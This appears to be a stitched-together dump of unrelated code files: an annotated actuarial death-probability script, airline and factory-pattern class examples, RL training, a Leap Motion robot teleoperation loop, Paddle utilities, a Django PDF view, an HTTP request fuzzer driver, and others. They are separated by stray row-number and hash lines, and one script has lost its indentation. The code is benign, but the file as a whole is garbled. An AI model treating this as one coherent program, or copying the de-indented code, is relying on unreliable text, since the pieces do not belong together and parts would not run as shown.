# script written by Randall Munroe. Most comments by Emily Cain (although there were a few brief ones explaining how the program worked before I looked at it)
# Summary of program (by Emily):
# this program takes inputs of current ages and genders to calculate the probability any or all of those people will die in a certain time period.
# if you input a year (after the current year) or a number of years (less than the current year) the program will calculate the probability that anyone or everyone will die in that time period. Either way, the program also determines the number of years for certain probabilities of anyone or everyone dying.
# The program outputs these calculations in an easily readable form.
#!/usr/bin/python
import sys
import datetime
# The following description was written by Randall (the programmer).
# Calculates death probabilities based on Social Security
# actuarial tables for a given group of people.
# Run with a list of ages/genders and an optional timespan (or year in the future):
# python actuary.py 63m 80m 75f 73m 10
# or:
# python actuary.py 63m 80m 75f 73m 2022
# This will give statistics for that group, including
# various probabilities over 10 years. Years can be
# ommitted and it will still give some statistics.
# If "Years" exceeds the current calendar year, it will be interpreted as a date.
#this is a list of lists. The outer list contains two inner lists, each of which is an actuarial table--one for men and one for women
bothtables=[[0.00756, 0.00052, 0.00035, 0.00025, 0.00020, 0.00018, 0.00017, 0.00016, 0.00014, 0.00011, 0.00009, 0.00010, 0.00015, 0.00027, 0.00043, 0.00061, 0.00078, 0.00094, 0.00107, 0.00119, 0.00131, 0.00142, 0.00149, 0.00151, 0.00148, 0.00143, 0.00140, 0.00138, 0.00137, 0.00139, 0.00141, 0.00143, 0.00147, 0.00152, 0.00158, 0.00165, 0.00174, 0.00186, 0.00202, 0.00221, 0.00243, 0.00267, 0.00291, 0.00317, 0.00344, 0.00373, 0.00405, 0.00441, 0.00480, 0.00524, 0.00573, 0.00623, 0.00671, 0.00714, 0.00756, 0.00800, 0.00853, 0.00917, 0.00995, 0.01086, 0.01190, 0.01301, 0.01413, 0.01522, 0.01635, 0.01760, 0.01906, 0.02073, 0.02265, 0.02482, 0.02729, 0.03001, 0.03289, 0.03592, 0.03918, 0.04292, 0.04715, 0.05173, 0.05665, 0.06206, 0.06821, 0.07522, 0.08302, 0.09163, 0.10119, 0.11183, 0.12367, 0.13679, 0.15124, 0.16702, 0.18414, 0.20255, 0.22224, 0.24314, 0.26520, 0.28709, 0.30846, 0.32891, 0.34803, 0.36544, 0.38371, 0.40289, 0.42304, 0.44419, 0.46640, 0.48972, 0.51421, 0.53992, 0.56691, 0.59526, 0.62502, 0.65628, 0.68909, 0.72354, 0.75972, 0.79771, 0.83759, 0.87947, 0.92345, 0.96962], [0.00615, 0.00041, 0.00025, 0.00018, 0.00015, 0.00014, 0.00014, 0.00013, 0.00012, 0.00011, 0.00010, 0.00010, 0.00012, 0.00016, 0.00021, 0.00028, 0.00034, 0.00039, 0.00042, 0.00043, 0.00045, 0.00047, 0.00048, 0.00049, 0.00050, 0.00051, 0.00052, 0.00053, 0.00056, 0.00059, 0.00063, 0.00068, 0.00073, 0.00078, 0.00084, 0.00091, 0.00098, 0.00108, 0.00118, 0.00130, 0.00144, 0.00158, 0.00173, 0.00189, 0.00206, 0.00225, 0.00244, 0.00264, 0.00285, 0.00306, 0.00329, 0.00355, 0.00382, 0.00409, 0.00437, 0.00468, 0.00505, 0.00549, 0.00603, 0.00665, 0.00736, 0.00813, 0.00890, 0.00967, 0.01047, 0.01136, 0.01239, 0.01357, 0.01491, 0.01641, 0.01816, 0.02008, 0.02210, 0.02418, 0.02641, 0.02902, 0.03206, 0.03538, 0.03899, 0.04301, 0.04766, 0.05307, 0.05922, 0.06618, 0.07403, 0.08285, 0.09270, 0.10365, 0.11574, 0.12899, 0.14343, 0.15907, 0.17591, 0.19393, 0.21312, 0.23254, 0.25193, 0.27097, 0.28933, 0.30670, 
0.32510, 0.34460, 0.36528, 0.38720, 0.41043, 0.43505, 0.46116, 0.48883, 0.51816, 0.54925, 0.58220, 0.61714, 0.65416, 0.69341, 0.73502, 0.77912, 0.82587, 0.87542, 0.92345, 0.96962]]
def deathprob(age, years): # probability that one person of this age/gender dies within `years`
    # Sign convention: negative ages encode female, positive male.
    act=[] # the relevant actuarial table (annual death rates indexed by age)
    if age<0: # negative age => female
        act=bothtables[1] # second table holds female rates
        age=-1*age # restore the age to a positive value
    else:
        act=bothtables[0] # first table holds male rates
    while(len(act)<int(age+years+2)): # extend the table past its last age as needed
        act.append(act[-1]**0.5) # sqrt of a rate < 1 pushes each appended rate closer to 1 (near-certain death)
    liveprob=1 # running probability of surviving every year considered so far
    i=0
    iage=int(age) # whole-year part of the age, used to index the table
    fage=age%1 # fractional part of the age, used to interpolate between adjacent rows
    while i<=years-1: # one iteration per full year in the span
        thisyear=(1-fage)*act[iage+i]+fage*act[iage+i+1] # linear interpolation of this year's death rate
        liveprob*=1-thisyear # survive the span only by surviving this year too
        i+=1
    if years%1: # Amortizes risk of dying over a trailing partial year:
        # P(live partial year) = P(live that full year)^(year fraction)
        lastyear=(1-fage)*act[iage+i]+fage*act[iage+i+1]
        lastyearlive=1-lastyear
        lastyearlive=lastyearlive**((years%1))
        liveprob*=lastyearlive
    return 1-liveprob # probability of dying = 1 - probability of surviving the whole span
def proballdie(ages, years): # probability that EVERYONE in `ages` dies within `years`
    # per-person survival probabilities over the span
    probsliving=[]
    for i in ages:
        probsliving.append(1-deathprob(i, years))
    # independent deaths assumed: multiply each person's death probability
    prod=1
    for i in probsliving:
        prod*=(1-i)
    return prod
def probanydie(ages, years): # probability that ANYONE in `ages` dies within `years`
    # per-person survival probabilities over the span
    probsliving=[]
    for i in ages:
        probsliving.append(1-deathprob(i, years))
    # P(at least one death) = 1 - P(everyone survives), assuming independence
    prod=1
    for i in probsliving:
        prod*=i
    return 1-prod
def calcexp(ages, prob, flag): # years until the group's death probability first reaches `prob`
    # flag == 0: probability that ALL die; otherwise: probability that ANY dies.
    # Successive refinement: advance in coarse steps, back off one step, then
    # repeat with a finer step, converging to 0.01-year resolution.
    i=0
    for interval in (10, 1, 0.1, 0.01): # coarse-to-fine step sizes
        probs=0
        while(probs<prob): # advance until the target probability is crossed
            i+=interval
            if flag==0: # probability the entire group dies within i years
                probs=proballdie(ages, i)
            else:
                probs=probanydie(ages, i) # probability any member dies within i years
        i-=interval # step back below the threshold before refining
    return i # years as a float, accurate to the finest interval
ages=[] # creates an empty list that will hold the ages of everyone you want to know about
# print sys.argv[1:]
for arg in sys.argv[1:]: #for each argument you have entered except the first one (which is the script name)
gender=1
years=1.0
if arg[-1]=='m' or arg[-1]=='M': #If the last character of the argument is M or m, then the person is male and we will use their age as a positive number
try:
ages.append(1*float(arg[:-1])) #try adding all but the last character of the argument to the ages table. The last character indicates gender, preceding characters indicate age.
except:
print "Error parsing argument", arg
elif arg[-1]=='f' or arg[-1]=='F': #if the last character of the argument is F or f, then the person is female and we will use their age as a negative number
try:
ages.append(-1*float(arg[:-1])) #try adding all but the last character of the argument, times -1 because female, to the ages table. The last character indicates gender, preceding characters indicate age.
except:
print "Error parsing argument", arg
else: #if the input appears to be neither a male or female person with the age, it is probably the time period we want to know about
try:
years=float(arg)
break
except:
print "Error parsing argument", arg
# shows user how to enter input correctly if they do it wrong
if not sys.argv[1:]:
print "The format is 'actuary.py 15m 80f 23', with a list of ages and a number of years to run the projections."
raise SystemExit
if not ages:
print "No ages specified. Format is 12m, 17f, etc."
raise SystemExit
# print "Ages:", ages
# print "Years:", years
(datetime.date.today()+datetime.timedelta(days=365.242191*1)).year #adding date object to a timedelta object to get a date object. finds its year. does ??? with it
someone_years=[calcexp(ages, 0.05, 1), # this returns a list of floats, probably. Or strings???? used as strings below
calcexp(ages, 0.5, 1),
calcexp(ages, 0.95, 1)]
someone_dates=[(datetime.date.today()+datetime.timedelta(days=365.242191*someone_years[0])).year, # takes the above numbers and uses them to calculate a date based on today's date + total time.
(datetime.date.today()+datetime.timedelta(days=365.242191*someone_years[1])).year,
(datetime.date.today()+datetime.timedelta(days=365.242191*someone_years[2])).year]
print "There is a 5% chance of someone dying within", someone_years[0], "years (by", str(someone_dates[0])+")." #concatenates to avoid automatic space; must convert to string first.
print "There is a 50% chance of someone dying within", someone_years[1], "years (by", str(someone_dates[1])+")."
print "There is a 95% chance of someone dying within", someone_years[2], "years (by", str(someone_dates[2])+")."
print ""
if len(ages)>1: #only makes sense to do an everyone statement if there are multiple people.
everyone_years=[calcexp(ages, 0.05, 0),
calcexp(ages, 0.5, 0),
calcexp(ages, 0.95, 0)]
everyone_dates=[(datetime.date.today()+datetime.timedelta(days=365.242191*everyone_years[0])).year,
(datetime.date.today()+datetime.timedelta(days=365.242191*everyone_years[1])).year,
(datetime.date.today()+datetime.timedelta(days=365.242191*everyone_years[2])).year]
print "There is a 5% chance of everyone dying within", everyone_years[0], "years (by", str(everyone_dates[0])+")."
print "There is a 50% chance of everyone dying within", everyone_years[1], "years (by", str(everyone_dates[1])+")."
print "There is a 95% chance of everyone dying within", everyone_years[2], "years (by", str(everyone_dates[2])+")."
if years: # if the user has input year
yearword="years"
if years==1: # changes from plural to singular if "years" is 1, so it says "1 year" instead of "1 years"
yearword="year"
print ""
if years>datetime.date.today().year: # Program assumes years under current year are a number of years, and years over current year refer to the date. If input years is greater than the current year...
years=years-datetime.date.today().year #...recalculate the "years" variable to be the number of years in the future that year is
if len(ages)>1: #if there is more than one person being analyzed, we will look at the probability of everyone dying
p=100*proballdie(ages, years) # converts probability into a percentage by multiplying by 100
printable="" # the percentage we will print out
if p<0.001: # if the percentage is really low/almost impossible
printable="<0.001"
elif p>99.99: # if the percentage is really high/almost guaranteed
printable=">99.99"
else:
printable=str(p)[:5] # if the percentage is not at one of the above extremes we want to see the actual percentage in our output
print "Probability of all dying in", years, yearword+": ", printable+"%" #outputs the info in an easily readable format
p=100*probanydie(ages, years) #regardless of how many people there are we will want to know the probability anyone dies
printable="" # the percentage we will print out
if p<0.001:
printable="<0.001" # if the percentage is really low/almost impossible
elif p>99.99:
printable=">99.99" # if the percentage is really high/almost guaranteed
print p # I don't know why he is choosing to do this, it seems odd/inconsistent with rest of program
else:
printable=str(p)[:5] # convert p to a string and assign the first 5 characters to printable
print "Probability of a death within", years, yearword+":", printable+"%" #outputs the info in an easily readable format
raise SystemExit #leaves the program
|
4,356 | c18e452592d53f22858f2307c60aa997b809c3c3 | s = input()
st = '>>-->'
st2 = '<--<<'
sch1 = sch2 = 0
i = 0
j = 0
k = -1
while i != -1:
i = s.find(st, j)
if (k != i) and (i != -1):
k = i
sch1 += 1
j += 1
j = 0
i = 0
k = -1
while i != -1:
i = s.find(st2, j)
if (k != i) and (i != -1):
k = i
sch2 += 1
j += 1
print(sch1+sch2) |
4,357 | 95a2f5abb37642651316a8954a4289e5b04e4916 | # Class 1: Flight which contains the flight number(f_id), its origin and destination, the number of stops between the
# origin and destination and the type of airlines(f_type)
class Flight():
    """A flight record: number, route, stop count, airline type, plus the
    id/type of the person the record is associated with."""

    def __init__(self, f_id, f_origin, f_destination, no_of_stops, flight_type, p_id, p_type):
        self.f_id = f_id
        self.origin = f_origin
        self.destination = f_destination
        self.stops = no_of_stops
        self.flight_type = flight_type
        self.pid = p_id
        self.ptype = p_type

    def get_flight_details(self, f_id):
        """Print a summary; the flight number shown is the argument, not self.f_id."""
        for label, value in (("Flight No:", f_id),
                             ("ORG:", self.origin),
                             ("DEST:", self.destination),
                             ("Flight Type:", self.flight_type)):
            print(label, value)
# Class2: Person which contains the personID(p_id), their name, phone number, gender, type of person(
# employee/passenger) and it inherits the Flight class to get the flight details.
class Person(Flight):
    """A person (employee or passenger) on a flight.

    Inherits Flight so that every person carries their flight details.
    """

    def __init__(self, p_id, p_type, p_gender, p_name, p_phonenumber, f_id, f_origin, f_destination, no_of_stops, flight_type):
        # Delegate flight-related fields (and p_id/p_type) to Flight first.
        super(Person, self).__init__(f_id, f_origin, f_destination, no_of_stops, flight_type, p_id, p_type)
        # Person-specific attributes.
        self.name = p_name
        self.gender = p_gender
        self.p_phonenumber = p_phonenumber
# Here we used MULTIPLE INHERITANCE as the Person is derived from Flight and the Employee and Passenger is derived
# from Person.
# Class3: Employee which is an inherited class from Person, SSN is the private data member, since we cant reveal the
# SSN.
class Employee(Person):
    """An airline employee (pilot); the SSN is kept private via name mangling."""

    def __init__(self, p_id, p_type, p_gender, p_name, p_phonenumber, f_id, e_SSN, f_origin, f_destination, no_of_stops, flight_type):
        super(Employee, self).__init__(p_id, p_type, p_gender, p_name, p_phonenumber, f_id,
                                       f_origin, f_destination, no_of_stops, flight_type)
        # Private: never revealed by any printing method.
        self.__emp_SSN = e_SSN

    def get_travel_details_employee(self):
        """Print this employee's flight assignment."""
        print("Hello Pilot ", self.name, "Here are your flight details")
        for label, value in (("Flight_ID:", self.f_id),
                             ("ORG:", self.origin),
                             ("DEST:", self.destination)):
            print(label, value)
# Class 4:Passenger which is an inherited class from Person, Passport Number is the private data member,
# since we cant reveal it.
class Passenger(Person):
    """A passenger; the class-level dict d maps flight id -> passenger names."""

    names = []   # kept for interface compatibility (unused by the methods below)
    d = dict()   # shared registry: flight id -> list of passenger names

    def __init__(self, p_id, p_type, p_gender, p_name, p_phonenumber, f_id, pno, f_origin, f_destination, no_of_stops, flight_type):
        super(Passenger, self).__init__(p_id, p_type, p_gender, p_name, p_phonenumber, f_id, f_origin, f_destination, no_of_stops, flight_type)
        self.pno = pno  # passport number (kept on the instance)
        # Register this passenger under their flight in the shared table.
        Passenger.d.setdefault(self.f_id, []).append(self.name)

    def get_travel_details_passanger(self):
        """Print this passenger's travel summary."""
        for label, value in (("Travel Details of ", self.name),
                             ("Flight Id:", self.f_id),
                             ("Flight Type:", self.flight_type),
                             ("ORG:", self.origin),
                             ("DEST:", self.destination)):
            print(label, value)

    def get_travelling_passengers(self):
        """Print the full flight -> passengers registry."""
        print("Passengers on the flight", Passenger.d)
class Ticket(Passenger):
    """A passenger plus seating details (boarding group, row, seat)."""

    def __init__(self, p_id, p_type, p_gender, p_name, p_phonenumber, f_id, pno, f_origin, f_destination, no_of_stops,
                 flight_type, boarding_group_no, row, seat_no):
        super(Ticket, self).__init__(p_id, p_type, p_gender, p_name, p_phonenumber, f_id, pno, f_origin, f_destination,
                                     no_of_stops, flight_type)
        self.boarding_group_no = boarding_group_no
        self.row = row
        self.seat_no = seat_no
        print("Your ticket details are below: ")

    def get_boarding_pass(self, p_name):
        """Print a boarding pass once per matching name entry in the registry."""
        for flight_id, passenger_names in Passenger.d.items():
            for candidate in passenger_names:
                if candidate == p_name:
                    print("Passenger Name:", p_name)
                    print("Flight Id:", flight_id)
                    print("Boarding Group and Seat No:", self.boarding_group_no, self.row, self.seat_no)
                    print("ORG:", self.origin)
                    print("DEST:", self.destination)
|
4,358 | 003976d850e371e01e6d0a307d3cf366f962c53d | from abc import abstractmethod
class BaseButton:
    """Abstract product: a button that can be drawn and clicked."""

    @abstractmethod
    def render(self):
        """Draw the button."""

    @abstractmethod
    def on_click(self):
        """Handle a click on the button."""
class WindowsButton(BaseButton):
    """Concrete product: the native Windows button."""

    def render(self):
        message = "Render window button"
        print(message)

    def on_click(self):
        message = "On click"
        print(message)
class HtmlButton(BaseButton):
    """Concrete product: the HTML (web) button."""

    def render(self):
        message = "Render html button"
        print(message)

    def on_click(self):
        message = "On click"
        print(message)
class BaseDialog:
    """Abstract creator: renders itself using a button from the factory method."""

    @abstractmethod
    def create_button(self) -> BaseButton:
        """Factory method: return a concrete BaseButton instance."""

    def render(self):
        """Create the OK button via the factory method and draw it."""
        self.create_button().render()
class WindowsDialog(BaseDialog):
    # Concrete creator: supplies the native Windows button.
    def create_button(self) -> BaseButton:
        return WindowsButton()
class WebDialog(BaseDialog):
    # Concrete creator: supplies the HTML button.
    def create_button(self) -> BaseButton:
        return HtmlButton()
class Application:
    """Client code: selects a dialog flavour from config and renders it."""

    def __init__(self):
        self.dialog = self.get_dialog()

    def read_config(self) -> dict:
        """Stub config loader; an empty dict means 'not Windows'."""
        return {}

    def get_dialog(self):
        """Pick the dialog implementation from the config's "OS" key."""
        is_windows = self.read_config().get("OS") == "Windows"
        return WindowsDialog() if is_windows else WebDialog()

    def render(self):
        self.dialog.render()
if __name__ == "__main__":
app = Application()
app.render()
|
4,359 | bf133e73f0c842603dbd7cc3a103a2aa95e2236e | from Common.TreasureIsland import TIenv
from .Agent import TIagent
import torch
# Train a TIagent on the TreasureIsland environment, saving a model/optimizer
# checkpoint and a value/policy-map snapshot every 100 episodes.
feature_size = (8, 8)
env = TIenv(frame_rate=0, num_marks=1, feature_size=feature_size)
agent = TIagent(feature_size=feature_size, learning_rate=0.0001)
EPISODE_COUNT = 50000
STEP_COUNT = 40  # run an intermediate training update every 40 env steps
for episode in range(EPISODE_COUNT):
    obs = env.reset()
    agent.reset()
    steps = 0
    if (episode + 1) % 100 == 0:
        # Periodic checkpoint of model + optimizer state, plus a visualisation.
        state = {
            'model_state': agent.model.state_dict(),
            'optim_state': agent.optim.state_dict()
        }
        torch.save(state, "models/" + str(episode+1) + '.pt')
        env.save_value_and_policy_map_for_A2C(agent.model, 'images/' + str(episode+1) + '.png')
    while True:
        env.render()
        action = agent.action(obs)
        obs = env.step(action)
        agent.reward(obs.reward)
        if obs.done:
            # Episode over: final training update, then start the next episode.
            agent.train(obs)
            break
        steps += 1
        if steps % STEP_COUNT == 0:
            # Mid-episode training update.
            agent.train(obs)
            continue  # NOTE(review): redundant — already the last statement of the loop body
    print(str(episode + 1) + ": " + str(agent.episode_reward))
|
4,360 | d6cea40e907a0424b2b1b8162f19aa8203443e55 | n = int(input())
# Print n in octal and in upper-case hexadecimal, stripping the
# '0o' / '0x' prefixes produced by oct()/hex().
octal_repr = oct(n)
hex_repr = hex(n)
print(octal_repr[2:], hex_repr[2:].upper())
# .upper(): lowercase hex digits -> uppercase
|
4,361 | 9ba60270a4afcf242de53692afd8ebff7d9b37a7 | from abc import ABC
class Parent(ABC):
    """Mixin that can print self._words (expected to be set by a subclass)."""

    def printing(self):
        # Relies on the concrete instance providing a _words attribute.
        print(self._words)
class Parent2(ABC):
    # %-style template; Child fills it in via `self.form % words`.
    form = "Parent2 Setup: %s"
class Child(Parent, Parent2):
    """Combines Parent2's template with Parent's printing: formats the given
    words and prints them immediately on construction."""

    def __init__(self, words):
        # self.form resolves through the MRO to Parent2.form.
        self._words = self.form % words
        super().printing()
if __name__ == "__main__":
Child("hello world")
|
4,362 | cabebeb5ca02da2505df4a138e8b28f74dd108fa |
class ClickAction:
    """Enumeration-style constants for click gestures."""
    Click, DoubleClick = 0, 1
class MouseButton:
    """Enumeration-style constants for mouse buttons."""
    Left, Right, Middle = 0, 1, 2
4,363 | 350a79d6cead6814ad48292b14a204e753dc938c | # Testing
# HTTPFuzz driver: parse CLI options, then emit one fuzzed HTTP request to
# stdout or write N requests into ./output/.
import sys, os
sys.dont_write_bytecode = True
import argparse, socket
from requestframe import RequestFrame
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--header-mutate-level", type=int, choices=range(11), nargs='?', help="Set the mutation level for the headers (0-10). Default = 5", default=5)
    parser.add_argument("--body-mutate-level", type=int, choices=range(11), nargs='?', help="Set the mutation level for the body (0-10). Default = 5", default=5)
    parser.add_argument("--request-mutate-level", type=int, choices=range(11), nargs='?', help="Set the mutation level for the request line (0-10). Default = 5", default=5)
    parser.add_argument("--body-type", type=str, choices=['json', 'junk', 'rand'], help="Set the data generated in the request body. Default = rand", default='rand')
    parser.add_argument("--num-headers", type=int, help="Sets the maximum number of headers. Default = number of available headers", default=-1)
    parser.add_argument("--generate-num", type=int, help="Number of requests to generate. Any more than 1 generated request will output to a new folder called output/. Default = 1", default=1)
    parser.add_argument('-v', '--version', action='version', version='HTTPFuzz Version: 1.0.1')
    args = parser.parse_args()
    if args.generate_num > 1:
        # BUG FIX: the old bare `except:` wrapped the whole generation loop, so
        # ANY failure (e.g. inside RequestFrame) was misreported as a directory
        # problem. Guard only os.mkdir; let generation errors propagate.
        try:
            os.mkdir("output")
        except OSError:
            exit("[-] Couldn't make the output directory. It might already exist.")
        for i in range(args.generate_num):
            with open("output/{}.txt".format(i + 1), 'w') as f:
                request_frame = RequestFrame(args)
                request_frame.generate()
                f.write(request_frame.request)
                print("[+] Wrote request to /output/{}.txt".format(i + 1))
        exit("[+] Finished creating requests")
    request_frame = RequestFrame(args)
    request_frame.generate()
    exit(request_frame.request)
|
4,364 | b34e293b509328c728909262594bdf3d3ecf5360 | #!/usr/bin/env python2
# A basic example of sending Blue a command in cartesian space.
from blue_interface import BlueInterface
import numpy as np
import time
import sys
import argparse
import Leap
from utils.rotations import quat2euler, euler2quat, mat2euler
from utils.leap_listener import SampleListener
import matplotlib.pyplot as plt
# Teleoperate a Blue robot arm from a Leap Motion sensor: either via inverse
# kinematics (--IK) or a direct hand-pose -> joint-angle mapping.
parser = argparse.ArgumentParser(description='switch the control mode')
parser.add_argument('--IK', default=False, action='store_true',
                    help='switch to IK-control')
args = parser.parse_args()
side = "right"
ip = "127.0.0.1"
blue = BlueInterface(side, ip)
# Initialize the blue gripper
blue.calibrate_gripper()
# Leap Motion
listener = SampleListener()
controller = Leap.Controller()
# Home pose for the 7-DOF arm; per-frame targets are offsets from this.
target_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])
target_angles_hist = target_angles_init.copy()  # previous target, for smoothing
i = 0  # frame counter
while True:
    hands_data = listener.get_hand(controller)
    ## IK approach
    if args.IK:
        if "Right hand" in hands_data.keys():
            hand_data = hands_data["Right hand"]
            pos = hand_data['palm_position']
            ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
            grab_strength = hand_data['grab_strength']
            target_position = [x/1000 for x in pos] # x, y, z
            # Reorder Leap axes into the robot frame.
            pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z
            ori[0], ori[1], ori[2] = ori[2], -ori[0]+3.14, ori[1] # z y x to x y z
            # Adjust the offset
            target_position[0] -= 0.4
            target_position[2] += 0.3
            target_orientation = list(euler2quat(ori)) # w, x, y, z
            # target_orientation = target_orientation[1:] + target_orientation[:1]
            # Compute IK solution
            goal_curr = blue.inverse_kinematics(target_position, target_orientation)
            # Send command to robot
            if goal_curr != []:
                goal = goal_curr
                print("goal: ", goal)
                blue.set_joint_positions(goal, duration=3, soft_position_control=False)
                blue.command_gripper(grab_strength, 10.0, wait=False)
            # Wait for system to settle
            i+=1
            time.sleep(3)
    # Direct motor angle mapping approach
    else:
        if "Right hand" in hands_data.keys():
            hand_data = hands_data["Right hand"]
            pos = hand_data['palm_position']
            ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
            grab_strength = hand_data['grab_strength']
            pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z
            ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1] # z y x to x y z
            target_position = [x/1000 for x in pos] # x, y, z
            target_position[0] += 0.05
            target_position[2] -= 0.2
            # Pre-defined Initial position of the robot
            target_angles = target_angles_init.copy()
            # orientation
            target_angles[0] += (ori[0]*1 + target_position[1]*1.5) # shoulder dir
            target_angles[4] += ori[2] # arm twist
            target_angles[5] += ori[1]*2 # wrist up down
            target_angles[6] += ori[2] # wrist twist
            # height
            target_angles[1] += target_position[2]*5
            target_angles[3] -= target_position[2]*5
            # depth direction stretch
            target_angles[3] -= target_position[0]*10
            smoothening = True
            if smoothening:
                # Exponential smoothing against the previous target to avoid jerky motion.
                alpha = 0.9
                target_angles = target_angles*(1-alpha) + target_angles_hist*alpha
                target_angles_hist = target_angles
            # Send command to robot
            print("target_angles: ", target_angles)
            blue.set_joint_positions(target_angles, duration=0.0025, soft_position_control=False)
        # The left hand's roll drives the gripper.
        if "Left hand" in hands_data.keys():
            hand_data = hands_data["Left hand"]
            pos = hand_data['palm_position']
            ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
            grab_strength = hand_data['grab_strength']
            blue.command_gripper(ori[1], 20.0, wait=False)
        # Wait for system to settle
        i+=1
        time.sleep(0.025)
|
4,365 | 364d70fab02291bafadebea68fee94c0210e2de9 | """
Various utilities for neural networks implemented by Paddle. This code is rewritten based on:
https://github.com/openai/guided-diffusion/blob/main/guided_diffusion/nn.py
"""
import math
import paddle
import paddle.nn as nn
class SiLU(nn.Layer):
    """SiLU (swish) activation: x * sigmoid(x)."""

    def forward(self, x):
        gate = nn.functional.sigmoid(x)
        return x * gate
class GroupNorm32(nn.GroupNorm):
    # NOTE(review): in the guided-diffusion torch original this forward casts
    # the input to float32; here it is a plain pass-through — presumably
    # intentional for the Paddle port, but worth confirming.
    def forward(self, x):
        return super().forward(x)
def conv_nd(dims, *args, **kwargs):
    """
    Create a 1D, 2D, or 3D convolution module.
    """
    conv_classes = {1: nn.Conv1D, 2: nn.Conv2D, 3: nn.Conv3D}
    if dims not in conv_classes:
        raise ValueError(f"unsupported dimensions: {dims}")
    return conv_classes[dims](*args, **kwargs)
def linear(*args, **kwargs):
    """
    Create a linear module.
    """
    # Thin alias kept for structural parity with the torch original.
    return nn.Linear(*args, **kwargs)
def avg_pool_nd(dims, *args, **kwargs):
    """
    Create a 1D, 2D, or 3D average pooling module.
    """
    pool_classes = {1: nn.AvgPool1D, 2: nn.AvgPool2D, 3: nn.AvgPool3D}
    if dims not in pool_classes:
        raise ValueError(f"unsupported dimensions: {dims}")
    return pool_classes[dims](*args, **kwargs)
def update_ema(target_params, source_params, rate=0.99):
    """
    Update target parameters to be closer to those of source parameters using
    an exponential moving average.
    :param target_params: the target parameter sequence.
    :param source_params: the source parameter sequence.
    :param rate: the EMA rate (closer to 1 means slower).
    """
    for targ, src in zip(target_params, source_params):
        # targ <- rate * targ + (1 - rate) * src, in place.
        # NOTE(review): `add_(src, alpha=...)` is the torch signature; confirm
        # Paddle tensors accept the `alpha` keyword here.
        targ.detach().mul_(rate).add_(src, alpha=1 - rate)
def zero_module(module):
    """
    Zero out the parameters of a module and return it.
    """
    for p in module.parameters():
        # The in-place zero on the detached view mutates the parameter storage.
        p.detach().zero_()
    return module
def scale_module(module, scale):
    """
    Scale the parameters of a module and return it.
    """
    for p in module.parameters():
        # In-place multiply on the detached view mutates the parameter storage.
        p.detach().mul_(scale)
    return module
def mean_flat(tensor):
"""
Take the mean over all non-batch dimensions.
"""
return tensor.mean(axis=list(range(1, len(tensor.shape))))
def normalization(channels):
    """
    Make a standard normalization layer.
    :param channels: number of input channels.
    :return: an nn.Module for normalization.
    """
    # 32 groups, matching the guided-diffusion reference this file ports.
    return GroupNorm32(32, channels)
def timestep_embedding(timesteps, dim, max_period=10000):
    """
    Create sinusoidal timestep embeddings.
    :param timesteps: a 1-D Tensor of N indices, one per batch element.
                      These may be fractional.
    :param dim: the dimension of the output.
    :param max_period: controls the minimum frequency of the embeddings.
    :return: an [N x dim] Tensor of positional embeddings.
    """
    half = dim // 2
    # Geometric frequency ladder from 1 down to ~1/max_period.
    freqs = paddle.exp(-math.log(max_period) * paddle.arange(start=0, end=half, dtype=paddle.float32) / half)
    args = paddle.cast(timesteps[:, None], 'float32') * freqs[None]
    embedding = paddle.concat([paddle.cos(args), paddle.sin(args)], axis=-1)
    if dim % 2:
        # Odd dim: pad with a zero column so the output is exactly [N, dim].
        embedding = paddle.concat([embedding, paddle.zeros_like(embedding[:, :1])], axis=-1)
    return embedding
def checkpoint(func, inputs, params, flag):
    """
    This function is disabled. And now just forward.
    """
    # `params` and `flag` are accepted only for API compatibility with the
    # original gradient-checkpointing signature; they are ignored.
    return func(*inputs)
|
4,366 | 431f109903e014a29aed7f125d47f327e17b9f65 | from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.urls import reverse
from gatheros_event.views.mixins import AccountMixin
from gatheros_subscription.helpers.extract import (
create_extract,
get_extract_file_name,
)
from gatheros_subscription.models import Subscription
class ExtractSubscriptionPDFView(AccountMixin):
    """Serves a subscription's extract as an inline PDF."""

    subscription = None  # resolved in pre_dispatch from the URL's pk

    def pre_dispatch(self, request):
        # Resolve the subscription (by uuid) before the request is dispatched.
        self.subscription = get_object_or_404(Subscription,
                                              uuid=self.kwargs.get('pk'))
        return super().pre_dispatch(request)

    def get_permission_denied_url(self):
        """Return the redirect URL used when permission is denied."""
        url_kwargs = {
            'event_pk': self.kwargs.get('event_pk'),
            'pk': self.kwargs.get('pk'),
        }
        return reverse('subscription:subscription-view', kwargs=url_kwargs)

    def get(self, request, *args, **kwargs):
        """Build the extract PDF and return it as an inline response."""
        pdf = create_extract(subscription=self.subscription,
                             user=self.request.user)
        filename = get_extract_file_name(subscription=self.subscription)
        response = HttpResponse(pdf, content_type='application/pdf')
        response['Content-Disposition'] = 'inline; filename="{}"'.format(filename)
        return response

    def can_access(self):
        # Extracts only exist for paid lots.
        return self.subscription.lot.price > 0
|
4,367 | 591d0a166af5b8d0bed851c2f56ecc3da4f3a5eb | """
Generates a temperature celsius to fahrenheit conversion table
AT
11-10-2018
"""
__author__ = "Aspen Thompson"
header = "| Celsius | Fahrenheit |"
line = "-" * len(header)
print("{0}\n{1}\n{0}".format(line, header))
for i in range(-10, 31):
print("| {:^7} | {:^10.10} |".format(i, i * 1.8 + 32))
|
4,368 | 883d2efeb6d7d43cf82eef2e0397110fd8e3ea03 | # Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""eval standalone script"""
import os
import re
import argparse
from mindspore import context
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from src.dataset import create_dataset
from src.config import eval_cfg, student_net_cfg, task_cfg
from src.tinybert_model import BertModelCLS
def parse_args():
    """
